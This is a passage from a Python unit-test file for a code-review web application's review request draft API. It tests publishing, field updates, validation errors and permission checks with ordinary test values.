# promoted to the review request upon publishing.
review_request = ReviewRequest.objects.get(pk=review_request.id)
self.assertIn('my-test', review_request.extra_data)
self.assertEqual(review_request.extra_data['my-test'], 'foo')
self.assertNotIn('unbound', review_request.extra_data)
self.assertIn('my-test_text_type', review_request.extra_data)
self.assertEqual(review_request.extra_data['my-test_text_type'],
'markdown')
self.assertTrue(review_request.public)
finally:
fieldset.remove_field(CustomField)
def test_post_with_publish_with_first_draft_as_other_user(self):
"""Testing the POST review-requests/<id>/draft/ API with first draft
as other user (with can_edit_reviewrequest after submit-as)
"""
user = User.objects.get(username='doc')
self.assertNotEqual(self.user, user)
self.user.user_permissions.add(
Permission.objects.get(codename='can_edit_reviewrequest'))
review_request = self.create_review_request(submitter=user,
target_people=[user])
self.spy_on(review_request_publishing.send)
self.spy_on(review_request_published.send)
rsp = self.api_post(
get_review_request_draft_url(review_request),
{
'public': True,
},
expected_mimetype=review_request_draft_item_mimetype)
self.assertEqual(rsp['stat'], 'ok')
review_request = ReviewRequest.objects.get(pk=review_request.id)
self.assertTrue(review_request.public)
self.assertTrue(review_request_publishing.send.called_with(
sender=ReviewRequest,
user=user))
self.assertTrue(review_request_published.send.called_with(
sender=ReviewRequest,
user=user))
def test_post_with_publish_with_publish_as_owner(self):
"""Testing the POST review-requests/<id>/draft/ API with
publish_as_owner=
"""
user = User.objects.get(username='doc')
self.assertNotEqual(self.user, user)
self.user.user_permissions.add(
Permission.objects.get(codename='can_edit_reviewrequest'))
review_request = self.create_review_request(submitter=user,
publish=True,
target_people=[user])
self.spy_on(review_request_publishing.send)
self.spy_on(review_request_published.send)
rsp = self.api_post(
get_review_request_draft_url(review_request),
{
'summary': 'New summary',
'public': True,
'publish_as_owner': True,
},
expected_mimetype=review_request_draft_item_mimetype)
self.assertEqual(rsp['stat'], 'ok')
review_request = ReviewRequest.objects.get(pk=review_request.id)
self.assertEqual(review_request.summary, 'New summary')
self.assertTrue(review_request.public)
self.assertTrue(review_request_publishing.send.called_with(
sender=ReviewRequest,
user=user))
self.assertTrue(review_request_published.send.called_with(
sender=ReviewRequest,
user=user))
#
# HTTP PUT tests
#
def setup_basic_put_test(self, user, with_local_site, local_site_name,
put_valid_data):
review_request = self.create_review_request(
with_local_site=with_local_site,
submitter=user,
publish=True)
draft = ReviewRequestDraft.create(review_request)
return (get_review_request_draft_url(review_request, local_site_name),
review_request_draft_item_mimetype,
{'description': 'New description'},
draft,
[review_request])
def check_put_result(self, user, item_rsp, draft, review_request):
draft = ReviewRequestDraft.create(review_request)
self.compare_item(item_rsp, draft)
def test_put_with_no_changes(self):
"""Testing the PUT review-requests/<id>/draft/ API
with no changes made to the fields
"""
review_request = self.create_review_request(submitter=self.user,
publish=True)
ReviewRequestDraft.create(review_request)
self.spy_on(ChangeDescription.save, owner=ChangeDescription)
self.spy_on(ReviewRequestDraft.save, owner=ReviewRequestDraft)
rsp = self.api_put(
get_review_request_draft_url(review_request),
{'public': True},
expected_status=NOTHING_TO_PUBLISH.http_status)
self.assertEqual(rsp['stat'], 'fail')
self.assertEqual(rsp['err']['code'], NOTHING_TO_PUBLISH.code)
self.assertFalse(ChangeDescription.save.called)
self.assertFalse(ReviewRequestDraft.save.called)
def test_put_with_text_type_markdown(self):
"""Testing the PUT review-requests/<id>/draft/ API
with legacy text_type=markdown
"""
self._test_put_with_text_types(
text_type_field='text_type',
text_type_value='markdown',
expected_change_text_type='markdown',
expected_description_text_type='markdown',
expected_testing_done_text_type='markdown',
expected_custom_field_text_type='markdown',
expected_changedesc_update_fields=['rich_text'],
expected_draft_update_fields=['description_rich_text',
'testing_done_rich_text'])
def test_put_with_text_type_plain(self):
"""Testing the PUT review-requests/<id>/draft/ API
with legacy text_type=plain
"""
self._test_put_with_text_types(
text_type_field='text_type',
text_type_value='plain',
expected_change_text_type='plain',
expected_description_text_type='plain',
expected_testing_done_text_type='plain',
expected_custom_field_text_type='plain',
expected_changedesc_update_fields=['rich_text'],
expected_draft_update_fields=['description_rich_text',
'testing_done_rich_text'])
def test_put_with_changedescription_text_type_markdown(self):
"""Testing the PUT review-requests/<id>/draft/ API
with changedescription_text_type=markdown
"""
self._test_put_with_text_types(
text_type_field='changedescription_text_type',
text_type_value='markdown',
expected_change_text_type='markdown',
expected_description_text_type='plain',
expected_testing_done_text_type='plain',
expected_custom_field_text_type='markdown',
expected_changedesc_update_fields=['rich_text'])
def test_put_with_changedescription_text_type_plain(self):
"""Testing the PUT review-requests/<id>/draft/ API
with changedescription_text_type=plain
"""
self._test_put_with_text_types(
text_type_field='changedescription_text_type',
text_type_value='plain',
expected_change_text_type='plain',
expected_description_text_type='plain',
expected_testing_done_text_type='plain',
expected_custom_field_text_type='markdown',
expected_changedesc_update_fields=['rich_text'])
def test_put_with_description_text_type_markdown(self):
"""Testing the PUT review-requests/<id>/draft/ API
with description_text_type=markdown
"""
self._test_put_with_text_types(
text_type_field='description_text_type',
text_type_value='markdown',
expected_change_text_type='plain',
expected_description_text_type='markdown',
expected_testing_done_text_type='plain',
expected_custom_field_text_type='markdown',
expected_draft_update_fields=['description_rich_text'])
def test_put_with_description_text_type_plain(self):
"""Testing the PUT review-requests/<id>/draft/ API
with description_text_type=plain
"""
self._test_put_with_text_types(
text_type_field='description_text_type',
text_type_value='plain',
expected_change_text_type='plain',
expected_description_text_type='plain',
expected_testing_done_text_type='plain',
expected_custom_field_text_type='markdown',
expected_draft_update_fields=['description_rich_text'])
def test_put_with_testing_done_text_type_markdown(self):
"""Testing the PUT review-requests/<id>/draft/ API
with testing_done_text_type=markdown
"""
self._test_put_with_text_types(
text_type_field='testing_done_text_type',
text_type_value='markdown',
expected_change_text_type='plain',
expected_description_text_type='plain',
expected_testing_done_text_type='markdown',
expected_custom_field_text_type='markdown',
expected_draft_update_fields=['testing_done_rich_text'])
def test_put_with_testing_done_text_type_plain(self):
"""Testing the PUT review-requests/<id>/draft/ API
with testing_done_text_type=plain
"""
self._test_put_with_text_types(
text_type_field='testing_done_text_type',
text_type_value='plain',
expected_change_text_type='plain',
expected_description_text_type='plain',
expected_testing_done_text_type='plain',
expected_custom_field_text_type='markdown',
expected_draft_update_fields=['testing_done_rich_text'])
def test_put_with_custom_field_text_type_markdown(self):
"""Testing the PUT review-requests/<id>/draft/ API
with extra_data.*_text_type=markdown
"""
self._test_put_with_text_types(
text_type_field='extra_data.mytext_text_type',
text_type_value='markdown',
expected_change_text_type='plain',
expected_description_text_type='plain',
expected_testing_done_text_type='plain',
expected_custom_field_text_type='markdown')
def test_put_with_custom_field_text_type_plain(self):
"""Testing the PUT review-requests/<id>/draft/ API
with extra_data.*_text_type=plain
"""
self._test_put_with_text_types(
text_type_field='extra_data.mytext_text_type',
text_type_value='plain',
expected_change_text_type='plain',
expected_description_text_type='plain',
expected_testing_done_text_type='plain',
expected_custom_field_text_type='plain')
@webapi_test_template
def test_put_with_branch(self):
"""Testing the PUT <URL> API with branch field"""
review_request = self.create_review_request(submitter=self.user,
publish=True)
ReviewRequestDraft.create(review_request)
self.spy_on(ChangeDescription.save, owner=ChangeDescription)
self.spy_on(ReviewRequestDraft.save, owner=ReviewRequestDraft)
rsp = self.api_put(
get_review_request_draft_url(review_request),
{
'branch': 'new branch',
},
expected_mimetype=review_request_draft_item_mimetype)
self.assertEqual(rsp['stat'], 'ok')
self.assertEqual(rsp['draft']['branch'], 'new branch')
draft = ReviewRequestDraft.objects.get(pk=rsp['draft']['id'])
self.assertEqual(draft.branch, 'new branch')
self.assertFalse(ChangeDescription.save.called)
self.assertTrue(ReviewRequestDraft.save.last_called_with(
update_fields=['branch', 'last_updated']))
@webapi_test_template
def test_put_with_bugs_closed(self):
"""Testing the PUT <URL> API with bugs_closed field"""
review_request = self.create_review_request(submitter=self.user,
publish=True)
ReviewRequestDraft.create(review_request)
self.spy_on(ChangeDescription.save, owner=ChangeDescription)
self.spy_on(ReviewRequestDraft.save, owner=ReviewRequestDraft)
rsp = self.api_put(
get_review_request_draft_url(review_request),
{
'bugs_closed': '10,20, 300,,',
},
expected_mimetype=review_request_draft_item_mimetype)
self.assertEqual(rsp['stat'], 'ok')
self.assertEqual(rsp['draft']['bugs_closed'], ['10', '20', '300'])
draft = ReviewRequestDraft.objects.get(pk=rsp['draft']['id'])
self.assertEqual(draft.get_bug_list(), ['10', '20', '300'])
self.assertFalse(ChangeDescription.save.called)
self.assertTrue(ReviewRequestDraft.save.last_called_with(
update_fields=['bugs_closed', 'last_updated']))
@webapi_test_template
def test_put_with_changedescription(self):
"""Testing the PUT <URL> with a change description"""
review_request = self.create_review_request(submitter=self.user,
publish=True)
ReviewRequestDraft.create(review_request)
self.spy_on(ChangeDescription.save, owner=ChangeDescription)
self.spy_on(ReviewRequestDraft.save, owner=ReviewRequestDraft)
changedesc = 'This is a test change description.'
rsp = self.api_put(
get_review_request_draft_url(review_request),
{
'changedescription': changedesc,
},
expected_mimetype=review_request_draft_item_mimetype)
self.assertEqual(rsp['stat'], 'ok')
self.assertEqual(rsp['draft']['changedescription'], changedesc)
draft = ReviewRequestDraft.objects.get(pk=rsp['draft']['id'])
self.assertIsNotNone(draft.changedesc)
self.assertEqual(draft.changedesc.text, changedesc)
self.assertTrue(ChangeDescription.save.last_called_with(
update_fields=['text']))
self.assertFalse(ReviewRequestDraft.save.called)
def test_put_with_commit_id(self):
"""Testing the PUT review-requests/<id>/draft/ API with commit_id"""
review_request = self.create_review_request(submitter=self.user,
publish=True)
ReviewRequestDraft.create(review_request)
self.spy_on(ChangeDescription.save, owner=ChangeDescription)
self.spy_on(ReviewRequestDraft.save, owner=ReviewRequestDraft)
commit_id = 'abc123'
rsp = self.api_put(
get_review_request_draft_url(review_request),
{
'commit_id': commit_id,
},
expected_mimetype=review_request_draft_item_mimetype)
self.assertEqual(rsp['stat'], 'ok')
self.assertEqual(rsp['draft']['commit_id'], commit_id)
self.assertEqual(rsp['draft']['summary'], review_request.summary)
self.assertEqual(rsp['draft']['description'],
review_request.description)
review_request = ReviewRequest.objects.get(pk=review_request.pk)
self.assertNotEqual(review_request.commit_id, commit_id)
self.assertFalse(ChangeDescription.save.called)
self.assertTrue(ReviewRequestDraft.save.last_called_with(
update_fields=['commit_id', 'last_updated']))
def test_put_with_commit_id_and_used_in_review_request(self):
"""Testing the PUT review-requests/<id>/draft/ API with commit_id
used in another review request
"""
commit_id = 'abc123'
self.create_review_request(submitter=self.user,
commit_id=commit_id,
publish=True)
review_request = self.create_review_request(submitter=self.user,
publish=True)
self.spy_on(ChangeDescription.save, owner=ChangeDescription)
self.spy_on(ReviewRequestDraft.save, owner=ReviewRequestDraft)
rsp = self.api_put(
get_review_request_draft_url(review_request),
{
'commit_id': commit_id,
},
expected_status=409)
self.assertEqual(rsp['stat'], 'fail')
self.assertEqual(rsp['err']['code'], COMMIT_ID_ALREADY_EXISTS.code)
review_request = ReviewRequest.objects.get(pk=review_request.pk)
self.assertIsNone(review_request.commit_id)
self.assertFalse(ChangeDescription.save.called)
self.assertFalse(ReviewRequestDraft.save.called)
def test_put_with_commit_id_and_used_in_draft(self):
"""Testing the PUT review-requests/<id>/draft/ API with commit_id
used in another review request draft
"""
commit_id = 'abc123'
existing_review_request = self.create_review_request(
submitter=self.user,
publish=True)
existing_draft = ReviewRequestDraft.create(existing_review_request)
existing_draft.commit_id = commit_id
existing_draft.save(update_fields=('commit_id',))
review_request = self.create_review_request(submitter=self.user,
publish=True)
self.spy_on(ChangeDescription.save, owner=ChangeDescription)
self.spy_on(ReviewRequestDraft.save, owner=ReviewRequestDraft)
rsp = self.api_put(
get_review_request_draft_url(review_request),
{
'commit_id': commit_id,
},
expected_status=409)
self.assertEqual(rsp['stat'], 'fail')
self.assertEqual(rsp['err']['code'], COMMIT_ID_ALREADY_EXISTS.code)
review_request = ReviewRequest.objects.get(pk=review_request.pk)
self.assertIsNone(review_request.commit_id)
self.assertFalse(ChangeDescription.save.called)
self.assertFalse(ReviewRequestDraft.save.called)
def test_put_with_commit_id_empty_string(self):
"""Testing the PUT review-requests/<id>/draft/ API with commit_id=''"""
review_request = self.create_review_request(submitter=self.user,
publish=True)
ReviewRequestDraft.create(review_request)
self.spy_on(ChangeDescription.save, owner=ChangeDescription)
self.spy_on(ReviewRequestDraft.save, owner=ReviewRequestDraft)
rsp = self.api_put(
get_review_request_draft_url(review_request),
{
'commit_id': '',
},
expected_mimetype=review_request_draft_item_mimetype)
self.assertEqual(rsp['stat'], 'ok')
self.assertIsNone(rsp['draft']['commit_id'])
review_request = ReviewRequest.objects.get(pk=review_request.pk)
self.assertIsNone(review_request.commit_id)
self.assertFalse(ChangeDescription.save.called)
self.assertFalse(ReviewRequestDraft.save.called)
@add_fixtures(['test_scmtools'])
def test_put_with_commit_id_with_update_from_commit_id(self):
"""Testing the PUT review-requests/<id>/draft/ API with
commit_id and update_from_commit_id=1
"""
repository = self.create_repository(tool_name='Test')
review_request = self.create_review_request(submitter=self.user,
repository=repository,
publish=True)
ReviewRequestDraft.create(review_request)
commit_id = 'abc123'
self.spy_on(ChangeDescription.save, owner=ChangeDescription)
self.spy_on(ReviewRequestDraft.save, owner=ReviewRequestDraft)
rsp = self.api_put(
get_review_request_draft_url(review_request),
{
'commit_id': commit_id,
'update_from_commit_id': True,
},
expected_mimetype=review_request_draft_item_mimetype)
self.assertEqual(rsp['stat'], 'ok')
self.assertEqual(rsp['draft']['commit_id'], commit_id)
self.assertEqual(rsp['draft']['summary'], 'Commit summary')
self.assertEqual(rsp['draft']['description'], 'Commit description.')
review_request = ReviewRequest.objects.get(pk=review_request.pk)
self.assertNotEqual(review_request.commit_id, commit_id)
self.assertNotEqual(review_request.description, 'Commit description.')
self.assertNotEqual(review_request.summary, 'Commit summary')
draft = review_request.get_draft()
self.assertEqual(draft.commit_id, commit_id)
self.assertEqual(draft.description, 'Commit description.')
self.assertEqual(draft.summary, 'Commit summary')
self.assertFalse(ChangeDescription.save.called)
self.assertTrue(ReviewRequestDraft.save.last_called_with(
update_fields=['commit_id', 'description', 'description_rich_text',
'diffset', 'last_updated', 'summary']))
def test_put_with_depends_on(self):
"""Testing the PUT review-requests/<id>/draft/ API
with depends_on field
"""
review_request = self.create_review_request(submitter=self.user,
publish=True)
ReviewRequestDraft.create(review_request)
depends_1 = self.create_review_request(
summary='Dependency 1',
publish=True)
depends_2 = self.create_review_request(
summary='Dependency 2',
publish=True)
self.spy_on(ChangeDescription.save, owner=ChangeDescription)
self.spy_on(ReviewRequestDraft.save, owner=ReviewRequestDraft)
rsp = self.api_put(
get_review_request_draft_url(review_request),
{
'depends_on': '%s, %s,,' % (depends_1.pk, depends_2.pk),
},
expected_mimetype=review_request_draft_item_mimetype)
self.assertEqual(rsp['stat'], 'ok')
depends_on = rsp['draft']['depends_on']
self.assertEqual(len(depends_on), 2)
depends_on.sort(key=lambda x: x['title'])
self.assertEqual(depends_on[0]['title'], depends_1.summary)
self.assertEqual(depends_on[1]['title'], depends_2.summary)
draft = ReviewRequestDraft.objects.get(pk=rsp['draft']['id'])
self.assertEqual(list(draft.depends_on.order_by('pk')),
[depends_1, depends_2])
self.assertEqual(list(depends_1.draft_blocks.all()), [draft])
self.assertEqual(list(depends_2.draft_blocks.all()), [draft])
self.assertFalse(ChangeDescription.save.called)
self.assertTrue(ReviewRequestDraft.save.last_called_with(
update_fields=['last_updated']))
@add_fixtures(['test_site'])
def test_put_with_depends_on_and_site(self):
"""Testing the PUT review-requests/<id>/draft/ API
with depends_on field and local site
"""
review_request = self.create_review_request(submitter='doc',
with_local_site=True)
ReviewRequestDraft.create(review_request)
self._login_user(local_site=True)
depends_1 = self.create_review_request(
with_local_site=True,
submitter=self.user,
summary='Test review request',
local_id=3,
publish=True)
# This isn't the review request we want to match.
bad_depends = self.create_review_request(id=3, publish=True)
self.spy_on(ChangeDescription.save, owner=ChangeDescription)
self.spy_on(ReviewRequestDraft.save, owner=ReviewRequestDraft)
rsp = self.api_put(
get_review_request_draft_url(review_request, self.local_site_name),
{'depends_on': '3'},
expected_mimetype=review_request_draft_item_mimetype)
self.assertEqual(rsp['stat'], 'ok')
depends_on = rsp['draft']['depends_on']
self.assertEqual(len(depends_on), 1)
self.assertNotEqual(rsp['draft']['depends_on'][0]['title'],
bad_depends.summary)
self.assertEqual(rsp['draft']['depends_on'][0]['title'],
depends_1.summary)
draft = ReviewRequestDraft.objects.get(pk=rsp['draft']['id'])
self.assertEqual(list(draft.depends_on.all()), [depends_1])
self.assertEqual(list(depends_1.draft_blocks.all()), [draft])
self.assertEqual(bad_depends.draft_blocks.count(), 0)
self.assertFalse(ChangeDescription.save.called)
self.assertTrue(ReviewRequestDraft.save.last_called_with(
update_fields=['last_updated']))
def test_put_with_depends_on_invalid_id(self):
"""Testing the PUT review-requests/<id>/draft/ API
with depends_on field and invalid ID
"""
review_request = self.create_review_request(submitter=self.user,
publish=True)
ReviewRequestDraft.create(review_request)
self.spy_on(ChangeDescription.save, owner=ChangeDescription)
self.spy_on(ReviewRequestDraft.save, owner=ReviewRequestDraft)
rsp = self.api_put(
get_review_request_draft_url(review_request),
{
'depends_on': '10000,https://blah/,/r/123/,BUG-123',
},
expected_status=400)
self.assertEqual(rsp['stat'], 'fail')
self.assertEqual(rsp['err']['code'], INVALID_FORM_DATA.code)
self.assertEqual(rsp['draft']['depends_on'], [])
self.assertEqual(rsp['fields'], {
'depends_on': ['10000', 'https://blah/', '/r/123/', 'BUG-123'],
})
draft = review_request.get_draft()
self.assertEqual(draft.depends_on.count(), 0)
self.assertFalse(ChangeDescription.save.called)
self.assertFalse(ReviewRequestDraft.save.called)
@webapi_test_template
def test_put_with_depends_on_and_emptying_list(self):
"""Testing the PUT <URL> API with depends_on emptying an existing
list
"""
dep1 = self.create_review_request(submitter=self.user,
summary='Dep 1',
publish=True)
dep2 = self.create_review_request(submitter=self.user,
summary='Dep 2',
publish=True)
self.create_review_request(submitter=self.user,
summary='Dep 3',
publish=True)
review_request = self.create_review_request(submitter=self.user)
draft = ReviewRequestDraft.create(review_request)
draft.depends_on.add(dep1, dep2)
rsp = self.api_put(
get_review_request_draft_url(review_request, None),
{
'depends_on': ''
},
expected_mimetype=review_request_draft_item_mimetype)
self.assertEqual(rsp['stat'], 'ok')
self.assertEqual(rsp['draft']['depends_on'], [])
draft = ReviewRequestDraft.objects.get(pk=draft.pk)
self.assertEqual(draft.depends_on.count(), 0)
@webapi_test_template
def test_put_with_summary(self):
"""Testing the PUT <URL> API with summary field"""
review_request = self.create_review_request(submitter=self.user,
publish=True)
ReviewRequestDraft.create(review_request)
self.spy_on(ChangeDescription.save, owner=ChangeDescription)
self.spy_on(ReviewRequestDraft.save, owner=ReviewRequestDraft)
rsp = self.api_put(
get_review_request_draft_url(review_request),
{
'summary': 'New summary',
},
expected_mimetype=review_request_draft_item_mimetype)
self.assertEqual(rsp['stat'], 'ok')
self.assertEqual(rsp['draft']['summary'], 'New summary')
draft = ReviewRequestDraft.objects.get(pk=rsp['draft']['id'])
self.assertEqual(draft.summary, 'New summary')
self.assertFalse(ChangeDescription.save.called)
self.assertTrue(ReviewRequestDraft.save.last_called_with(
update_fields=['last_updated', 'summary']))
@webapi_test_template
def test_put_with_summary_with_newline(self):
"""Testing the PUT <URL> API with summary field containing newline"""
review_request = self.create_review_request(submitter=self.user,
publish=True)
ReviewRequestDraft.create(review_request)
self.spy_on(ChangeDescription.save, owner=ChangeDescription)
self.spy_on(ReviewRequestDraft.save, owner=ReviewRequestDraft)
rsp = self.api_put(
get_review_request_draft_url(review_request),
{
'summary': 'New summary\nbah',
},
expected_status=400)
self.assertEqual(rsp['stat'], 'fail')
self.assertEqual(rsp['err']['code'], INVALID_FORM_DATA.code)
self.assertEqual(rsp['draft']['target_groups'], [])
self.assertTrue(rsp['fields'], {
'summary': ["The summary can't contain a newline"],
})
draft = ReviewRequestDraft.objects.get(pk=rsp['draft']['id'])
self.assertEqual(draft.summary, 'Test Summary')
self.assertFalse(ChangeDescription.save.called)
self.assertFalse(ReviewRequestDraft.save.called)
@webapi_test_template
def test_put_with_target_groups(self):
"""Testing the PUT <URL> API with target_groups field"""
group1 = self.create_review_group(name='group1')
group2 = self.create_review_group(name='group2')
review_request = self.create_review_request(submitter=self.user,
publish=True)
ReviewRequestDraft.create(review_request)
self.spy_on(ChangeDescription.save, owner=ChangeDescription)
self.spy_on(ReviewRequestDraft.save, owner=ReviewRequestDraft)
rsp = self.api_put(
get_review_request_draft_url(review_request),
{
'target_groups': 'group1,group2',
},
expected_mimetype=review_request_draft_item_mimetype)
self.assertEqual(rsp['stat'], 'ok')
self.assertEqual(
rsp['draft']['target_groups'],
[
{
'href': 'http://testserver/api/groups/group1/',
'method': 'GET',
'title': 'group1',
},
{
'href': 'http://testserver/api/groups/group2/',
'method': 'GET',
'title': 'group2',
},
])
draft = ReviewRequestDraft.objects.get(pk=rsp['draft']['id'])
self.assertEqual(list(draft.target_groups.all()),
[group1, group2])
self.assertFalse(ChangeDescription.save.called)
self.assertTrue(ReviewRequestDraft.save.last_called_with(
update_fields=['last_updated']))
@add_fixtures(['test_site'])
@webapi_test_template
def test_put_with_target_groups_with_local_site(self):
"""Testing the PUT <URL> API with target_groups field and Local Site
draft
"""
self.user = self._login_user(local_site=True)
review_request = self.create_review_request(submitter=self.user,
with_local_site=True,
publish=True)
ReviewRequestDraft.create(review_request)
local_site = review_request.local_site
group1 = self.create_review_group(name='group1',
local_site=local_site)
group2 = self.create_review_group(name='group2',
local_site=local_site)
self.spy_on(ChangeDescription.save, owner=ChangeDescription)
self.spy_on(ReviewRequestDraft.save, owner=ReviewRequestDraft)
rsp = self.api_put(
get_review_request_draft_url(review_request, local_site),
{
'target_groups': 'group1,group2',
},
expected_mimetype=review_request_draft_item_mimetype)
self.assertEqual(rsp['stat'], 'ok')
self.assertEqual(
rsp['draft']['target_groups'],
[
{
'href': 'http://testserver/s/local-site-1/'
'api/groups/group1/',
'method': 'GET',
'title': 'group1',
},
{
'href': 'http://testserver/s/local-site-1/'
'api/groups/group2/',
'method': 'GET',
'title': 'group2',
},
])
draft = ReviewRequestDraft.objects.get(pk=rsp['draft']['id'])
self.assertEqual(list(draft.target_groups.all()),
[group1, group2])
self.assertFalse(ChangeDescription.save.called)
self.assertTrue(ReviewRequestDraft.save.last_called_with(
update_fields=['last_updated']))
@add_fixtures(['test_site'])
@webapi_test_template
def test_put_with_target_groups_with_local_site_and_global_group(self):
"""Testing the PUT <URL> API with target_groups field and Local Site
draft with global group
"""
self.user = self._login_user(local_site=True)
review_request = self.create_review_request(submitter=self.user,
with_local_site=True,
publish=True)
ReviewRequestDraft.create(review_request)
local_site = review_request.local_site
self.create_review_group(name='group1', local_site=local_site)
self.create_review_group(name='group2')
self.spy_on(ChangeDescription.save, owner=ChangeDescription)
self.spy_on(ReviewRequestDraft.save, owner=ReviewRequestDraft)
rsp = self.api_put(
get_review_request_draft_url(review_request, local_site),
{
'target_groups': 'group1,group2',
},
expected_status=400)
self.assertEqual(rsp['stat'], 'fail')
self.assertEqual(rsp['err']['code'], INVALID_FORM_DATA.code)
self.assertEqual(rsp['draft']['target_groups'], [])
self.assertTrue(rsp['fields'], {
'target_groups': ['group2'],
})
draft = ReviewRequestDraft.objects.get(pk=rsp['draft']['id'])
self.assertFalse(draft.target_groups.exists())
self.assertFalse(ChangeDescription.save.called)
self.assertFalse(ReviewRequestDraft.save.called)
@webapi_test_template
def test_put_with_target_groups_and_emptying_list(self):
"""Testing the PUT <URL> API with target_groups emptying an existing
list
"""
group1 = self.create_review_group(name='group1')
group2 = self.create_review_group(name='group2')
self.create_review_group(name='group3')
review_request = self.create_review_request(submitter=self.user)
draft = ReviewRequestDraft.create(review_request)
draft.target_groups.add(group1, group2)
rsp = self.api_put(
get_review_request_draft_url(review_request, None),
{
'target_groups': ''
},
expected_mimetype=review_request_draft_item_mimetype)
self.assertEqual(rsp['stat'], 'ok')
self.assertEqual(rsp['draft']['target_groups'], [])
draft = ReviewRequestDraft.objects.get(pk=draft.pk)
self.assertEqual(draft.target_groups.count(), 0)
@webapi_test_template
def test_put_with_target_people_and_emptying_list(self):
"""Testing the PUT <URL> API with target_people emptying an existing
list
"""
reviewer = User.objects.create(username='reviewer')
review_request = self.create_review_request(submitter=self.user)
draft = ReviewRequestDraft.create(review_request)
draft.target_people.add(reviewer)
rsp = self.api_put(
get_review_request_draft_url(review_request, None),
{
'target_people': ''
},
expected_mimetype=review_request_draft_item_mimetype)
self.assertEqual(rsp['stat'], 'ok')
self.assertEqual(rsp['draft']['target_people'], [])
draft = ReviewRequestDraft.objects.get(pk=draft.pk)
self.assertEqual(draft.target_people.count(), 0)
@webapi_test_template
def test_put_with_target_people_and_invalid_user(self):
"""Testing the PUT <URL> API with target_people containing invalid
username
"""
review_request = self.create_review_request(submitter=self.user)
draft = ReviewRequestDraft.create(review_request)
self.spy_on(ChangeDescription.save, owner=ChangeDescription)
self.spy_on(ReviewRequestDraft.save, owner=ReviewRequestDraft)
rsp = self.api_put(
get_review_request_draft_url(review_request, None),
{
'target_people': 'invalid'
},
expected_status=INVALID_FORM_DATA.http_status)
self.assertEqual(rsp['stat'], 'fail')
self.assertEqual(rsp['err']['code'], INVALID_FORM_DATA.code)
self.assertEqual(rsp['fields'], {
'target_people': ['invalid'],
})
self.assertEqual(rsp['draft']['target_people'], [])
draft = ReviewRequestDraft.objects.get(pk=draft.pk)
self.assertFalse(draft.target_people.exists())
self.assertFalse(ChangeDescription.save.called)
self.assertFalse(ReviewRequestDraft.save.called)
@webapi_test_template
def test_put_with_target_people_and_auth_backend_lookup(self):
"""Testing the PUT <URL> API with target_people and unknown user
lookup in auth backend
"""
def _get_or_create_user(*args, **kwargs):
return User.objects.create(username='backend-user')
review_request = self.create_review_request(submitter=self.user)
draft = ReviewRequestDraft.create(review_request)
self.spy_on(ChangeDescription.save, owner=ChangeDescription)
self.spy_on(ReviewRequestDraft.save, owner=ReviewRequestDraft)
self.spy_on(StandardAuthBackend.get_or_create_user,
owner=StandardAuthBackend,
call_fake=_get_or_create_user)
rsp = self.api_put(
get_review_request_draft_url(review_request, None),
{
'target_people': 'backend-user',
},
expected_mimetype=review_request_draft_item_mimetype)
self.assertEqual(rsp['stat'], 'ok')
self.assertEqual(rsp['draft']['target_people'], [
{
'href': 'http://testserver/api/users/backend-user/',
'method': 'GET',
'title': 'backend-user',
},
])
self.assertTrue(StandardAuthBackend.get_or_create_user.called_with(
username='backend-user'))
draft = ReviewRequestDraft.objects.get(pk=draft.pk)
self.assertEqual(draft.target_people.count(), 1)
self.assertEqual(draft.target_people.get().username, 'backend-user')
self.assertFalse(ChangeDescription.save.called)
self.assertTrue(ReviewRequestDraft.save.last_called_with(
update_fields=['last_updated']))
@webapi_test_template
def test_put_with_target_people_and_auth_backend_lookup_error(self):
"""Testing the PUT <URL> API with target_people and unknown user
lookup in auth backend errors
"""
def _get_or_create_user(*args, **kwargs):
raise Exception()
self.spy_on(StandardAuthBackend.get_or_create_user,
owner=StandardAuthBackend,
call_fake=_get_or_create_user)
review_request = self.create_review_request(submitter=self.user)
draft = ReviewRequestDraft.create(review_request)
rsp = self.api_put(
get_review_request_draft_url(review_request, None),
{
'target_people': 'unknown',
},
expected_status=INVALID_FORM_DATA.http_status)
self.assertEqual(rsp['stat'], 'fail')
self.assertEqual(rsp['err']['code'], INVALID_FORM_DATA.code)
self.assertEqual(rsp['fields'], {
'target_people': ['unknown'],
})
self.assertEqual(rsp['draft']['target_people'], [])
self.assertTrue(StandardAuthBackend.get_or_create_user.called_with(
username='unknown'))
draft = ReviewRequestDraft.objects.get(pk=draft.pk)
self.assertFalse(draft.target_people.exists())
def test_put_with_permission_denied_error(self):
"""Testing the PUT review-requests/<id>/draft/ API
with Permission Denied error
"""
bugs_closed = '123,456'
review_request = self.create_review_request()
self.assertNotEqual(review_request.submitter, self.user)
rsp = self.api_put(
get_review_request_draft_url(review_request),
{'bugs_closed': bugs_closed},
expected_status=403)
self.assertEqual(rsp['stat'], 'fail')
self.assertEqual(rsp['err']['code'], PERMISSION_DENIED.code)
def test_put_publish(self):
"""Testing the PUT review-requests/<id>/draft/?public=1 API"""
# We need to send e-mail out for both the initial review request
# publish and the draft publish in order for the latter to have a
# "Re:" in the subject.
with self.siteconfig_settings({'mail_send_review_mail': True},
reload_settings=False):
review_request = self.create_review_request(submitter=self.user,
publish=True)
draft = ReviewRequestDraft.create(review_request)
draft.summary = 'My Summary'
draft.description = 'My Description'
draft.testing_done = 'My Testing Done'
draft.branch = 'My Branch'
draft.target_people.add(User.objects.get(username='doc'))
draft.save()
# Since we're only testing for the draft's publish e-mail,
# clear the outbox.
mail.outbox = []
rsp = self.api_put(
get_review_request_draft_url(review_request),
{'public': True},
expected_mimetype=review_request_draft_item_mimetype)
self.assertEqual(rsp['stat'], 'ok')
review_request = ReviewRequest.objects.get(pk=review_request.id)
self.assertEqual(review_request.summary, "My Summary")
self.assertEqual(review_request.description, "My Description")
self.assertEqual(review_request.testing_done, "My Testing Done")
self.assertEqual(review_request.branch, "My Branch")
self.assertTrue(review_request.public)
self.assertEqual(len(mail.outbox), 1)
self.assertEqual(
mail.outbox[0].subject,
"Re: Review Request %s: My Summary" % review_request.pk)
self.assertValidRecipients(["doc", "grumpy"])
def test_put_publish_with_new_submitter(self):
"""Testing the PUT review-requests/<id>/draft/?public=1 API
with new submitter
"""
review_request = self.create_review_request(submitter=self.user,
publish=True)
draft = ReviewRequestDraft.create(review_request)
draft.owner = User.objects.get(username='doc')
draft.target_people = [draft.owner]
draft.save()
rsp = self.api_put(
get_review_request_draft_url(review_request),
{'public': True},
expected_mimetype=review_request_draft_item_mimetype)
self.assertEqual(rsp['stat'], 'ok')
review_request = ReviewRequest.objects.get(pk=review_request.id)
